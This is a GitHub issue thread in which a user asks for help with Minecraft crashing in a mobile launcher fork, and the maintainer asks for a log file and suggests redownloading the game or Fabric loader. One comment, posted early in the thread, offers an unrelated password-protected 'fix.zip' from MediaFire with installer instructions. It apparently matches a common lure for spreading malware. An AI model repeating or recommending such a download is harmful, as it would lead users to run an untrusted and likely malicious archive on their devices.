### ISSUE TITLE
Keeps Going

### ISSUE THREAD

**Issue by AbyssTamer** [Vera-Firefly/PojavLauncher-Beta-Zink-CN#299]
My phone is a Tecno Pova 5: 256 GB ROM and 8GB of RAM, the version I play on is 1.21.1. @Vera-Firefly I tried putting the ModMenu mod but it crash anyways. Idk what to do. Also I deleted the Xaeros minimap mod too but it did not work

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AbyssTamer** [comment]
https://github.com/user-attachments/assets/97ca08b0-5390-4d77-ba3d-e3e366d120fd

Dang...

**Comment by ghost** [comment]
I think it's fixed check new update for launcher avaible
#298

**Comment by rishabha102010** [comment]
You need to add fabric api for putting more mods without crashing

**Comment by AbyssTamer** [comment]
> You need to add fabric api for putting more mods without crashing

Still crashing

**Comment by Vera-Firefly** [comment]
Can you provide the log file?

**Comment by rishabha102010** [comment]
Iam not a developer sorry

**Comment by rishabha102010** [comment]
If your using the correct version of mods then it won't crash . Or that mod is not supported by modrinite I think so

**Comment by AbyssTamer** [comment]
> Can you provide the log file?
![latestlog.txt](https://github.com/user-attachments/files/16825387/latestlog.txt)

There it is

**Comment by AbyssTamer** [comment]
> > Can you provide the log file?
> ![latestlog.txt](https://github.com/user-attachments/files/16825387/latestlog.txt)
> 
> There it is @Vera-Firefly

**Comment by Vera-Firefly** [comment]
> > > Can you provide the log file?
> > > ![latestlog.txt](https://github.com/user-attachments/files/16825387/latestlog.txt)
> > 
> > 
> > There it is @Vera-Firefly

Looks like you tried to get in without downloading the full file

**Comment by Vera-Firefly** [comment]
Try downloading again

**Comment by AbyssTamer** [comment]
> Try downloading again

The mod or the launcher?

**Comment by Vera-Firefly** [comment]
> > Try downloading again
> 
> The mod or the launcher?

game or fabric-loader
